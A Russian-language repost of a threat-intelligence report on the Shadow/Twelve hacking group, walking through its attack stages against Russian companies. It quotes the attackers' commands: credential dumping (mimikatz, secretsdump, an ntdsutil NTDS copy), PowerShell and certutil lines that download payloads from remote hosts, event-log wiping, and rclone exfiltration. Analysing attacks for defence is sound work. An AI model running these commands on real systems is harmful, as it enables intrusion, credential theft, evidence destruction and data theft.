![]() |
Эксперты Лаборатории цифровой криминалистики компании F.A.C.C.T. зафиксировалиатаки преступного синдиката Shadow и их сообщников на российские компании. Обе независимые группировки — вымогатели Shadow и хактивисты Twelve — на самом деле являются частями одной и той же хак-группы. Злоумышленники преследовали разные цели: Shadow была мотивирована на финансовую выгоду, тогда как Twelve стремилась к полному разрушению ИТ-инфраструктуры своих жертв. Рассмотрим подробнее все этапы атаки группировки.
Первоначальный доступ В различных атаках Shadow получают первоначальный доступ через фишинговые рассылки или легитимные аутентификационные данные, купленные на теневых площадках, или добытые в атаках на подрядчиков. Кроме того, они комибинируют два этих метода, отправляя фишинг с внутренних аккаунтов внутри компании. Так же для проникновения на периметр организаций группировка экспулатирует уязвимости в публично доступных сервисах.— RCE-уязвимости Atlassian Confluence (CVE-2023-22515, CVE-2023-22518); — цепочку уязвимостей Zimbra (CVE-2019-9670, CVE-2019-9621); — цепочку уязвимостей ProxyShell (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207); — RCE-уязвимость JetBrains TeamCity (CVE-2024-27198). Развитие в инфраструктуре Первоначально злоумышленники изучают окружение: содержимое доступных сетевых катологов, различных файлов, максимальную информацию о скомпрометированной учетной записи, о домене, в который она входит.Код:
whoamiКод:
whoami > C:\temp\v8_F105_4a.txtКод:
net user /domainКод:
net localgroup /domainКод:
net group «Администраторы домена» /domainКод:
nltest /trusted_domainsКод:
nltest /dclist:После похищения части информации атакующие приступают к повышению привилегий и дальнейшему развитию атаки. В случае, если у них есть доступ к непривилегированным аккаунтам, они могут воспользоваться уязвимостями (CVE-2021-40449, CVE-2022-21882, CVE-2022-21999, CVE-2023-21746, CVE-2020-1472). Для эксплуатации последней уязвимости используется инструмент AutoZerologon. В другом случае, когда у группировки уже есть права локального администратора, для получения СИСТЕМЫ они используют утилиту PsExec: Код:
psexec.exe -i -s cmdКод: Код:
mimikatz.exeОсуществив перемещение на один из хостов группировка доставляет свои инструменты в каталоги Public% , %Public%\Temp , %systemroot%\Logs , %ProgramData% , %userprofile%\Desktop , %userprofile%\Downloads.Помимо использования портативных версий утилит, атакующие также устанавливают через powershell необходимое им ПО, например Google Chrome. Так же для перемещения используется скомпрометированные NTLM-хеши. Используя NTLM-хеш привилегированной учетной записи Shadow с помощью программы SecretsDump удаленно извлекают NTLM-хеши из базы данных Active Directory. Код:
secretsdump.exe -hashes aad3b435b51404eeaad3b435b51404ee: -just-dcntlmКод:
domain_redacted/login_redacted@ -outputfile ntlm-extractКод:
powershell.exe ntdsutil.exe ‘ac i ntds’ ‘ifm’ ‘create full C:\Users\Public\Temp\log’ q qКод:
powershell.exe -ex bypass -f Get-RDPLogs.ps1 -ComputerName > log.txtКод:
Get-WinEvent «Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational» | ?{$_.ID -eq «1149»} | %{ New-Object PSObject -Property @{MachineName = $_.MachineName TimeCreated = $_.TimeCreatedUser = $_.Properties[0].Value Domain = $_.Properties[1].Value SourceIP = $_.Properties[2].Value } }Когда злоумышленникам не удается получить данные в открытом виде они включает протокол WDigestна целевых системах и завершают сеансы пользователей, чтобы вынудить их снова ввести свой пароль в уже небезопасной конфигурации системы, затем извлекают его. Код: Код:
psexec \\ cmdКод: Код:
psexec \\ cmdРазведкаиизучение Одновременно с получением данных происходит углубленная разведка с помощью инструментов AdExplorer, PingCastle, Slitheris Network Discovery, fscan, SoftPerfect Network Scanner, ADRecon, PowerView.ps1, SA.ps1, adPEAS.Закрепление Для закрепления Shadow используют инструмент Cobint,устанавливая его в качестве службы Windows. Загрузка ВПО осуществляется с помощью powershell скриптов.Код:
powershell.exe -ep byp ass -w hidden -c iex ((New ObjectNet.WebClient).DownloadString(‘http://*’))Код:
powershell.exe -ex bypass -c Invoke-WebRequest http://... -OutFile C:\ProgramData\InternetExplorer\*.ps1Код:
certutil.exe -urlcache -split -f «https[:]//4707-89-37-173-22.ngrok-free.app/Xazb5p8khy/OneDrive.exe»На случай обнаружения злоумышленники инсталлируют в качестве службы ПО AnyDesk, которое доставляют с официального ресурса или через буфер обмена. Далее злоумышленники создают локальные или доменные учетные записи и добавляют из в группу пользователей удаленного рабочего стола и в список разрешенных для подключений по RDP, маскируя их под легитимные сервисные записи (kvcservice, svcveeam, veeam). На Linux злоумышленники закрепляются через руткит Facefish, который прописывал путь к своей библиотеке /lib64/libs.so в файл /etc/ld.so.preload и перезапускал службы sshd. Уклонение от обнаружения Одним из главных приоритетов Shadow стало удаление загруженных ими инструментов и результатов их работы. Так, например они очищают записи ключа реестра HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Clientпользовательского реестра ntuser.dat, в котором хранится информация об успешных RDP подключения. Также они очищают журналы через wevtutil:Код:
cmd.exe /c for /F «tokens=*» %1 in (‘wevtutil.exe el’) DO wevtutil.exe cl «%1»Эксфильтрация и импакт Для восстановления удаленной информации атакующие используют Recuva, GiliSoft Data Recovery и Wise Data Recovery. Также, Shadow собирают информацию об авторизованных сессиях мессенджера Telegram.Эксфильтрация данных малогообъема проводится злоумышленниками через буфер обмена во время активных RDP-сессий. Данные среднегообъема могут загружаться на различные файлообменники (Mega[.]io , gofile[.]io , dropmefiles[.]net) при помощи веб-браузеров или RDP-сессий. Для эксфильтрации большихобъемов информации используется ПО Rcloneи протокол SFTP. Код:
rclone sync -i «Q:\Shares\ FinDep» :/home/root/ /FinDep --log-level INFO --progress > dism.logВ отношении Unix-систем используется ransomware семейства Babuk. Для доставки используется ПО WinSCP, при помощи которой программа-вымогатель копируется в каталог /tmp атакуемой системы. После чего в контексте SSH-сессии ей назначается атрибут выполнения, а затем производится ее запуск |
| Время: 23:39 |